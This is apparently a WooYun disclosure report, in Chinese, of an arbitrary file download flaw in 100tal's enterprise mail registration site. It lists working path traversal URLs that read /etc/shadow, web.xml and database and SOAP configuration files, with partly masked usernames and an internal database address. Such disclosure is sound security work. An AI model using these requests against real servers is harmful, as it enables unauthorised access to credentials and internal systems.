WooYun.org

#1、存在问题的页面
好未来企业邮箱注册系统

插件下载：http://youxiang.100tal.com/regmail/download.action?file=plugin/MacAddressViewer/MacAddressViewer.msi
file参数未过滤，导致任意文件下载。
#2、任意文件下载
仅以部分文件为例：
源代码：http://youxiang.100tal.com/regmail/download.action?file=index.jsp
shadow：http://youxiang.100tal.com/regmail/download.action?file=/plugin/../../../../../../etc/shadow
得到服务器的部分用户，密文就不贴上来了：l***e zh***an m***yuan l***a h***iao l***ei
web.xml：http://youxiang.100tal.com/regmail/download.action?file=/plugin/../WEB-INF/web.xml
#3、继续挖掘
读取web.xml，又进而得到以下文件：
http://youxiang.100tal.com/regmail/download.action?file=/plugin/../WEB-INF/classes/config/core/applicationContext.xml
http://youxiang.100tal.com/regmail/download.action?file=/plugin/../WEB-INF/classes/datasource.properties
http://youxiang.100tal.com/regmail/download.action?file=/plugin/..//WEB-INF/classes/prop.properties
其中，datasource.properties保存了数据库连接配置：
jdbc.url = jdbc:mysql://192.168.1.111:3409/regmail?zeroDateTimeBehavior=convertToNull&characterEncoding=UTF-8
jdbc.user = RegMail
jdbc.password = 略
prop.properties保存了部分系统配置，包括员工中心soap接口、管理员邮箱（发信邮箱？未验证）等：
#员工中心接口地址根路径
user.center.rootpath=http://oas.xueersi.org/
#员工中心soap接口fsite值
usercenter.soap.fsite=5
#员工中心soap接口uskey值
usercenter.soap.uskey=略
得到的邮箱和密码可登录：（未翻看邮件，仅截图组织通讯录证明危害）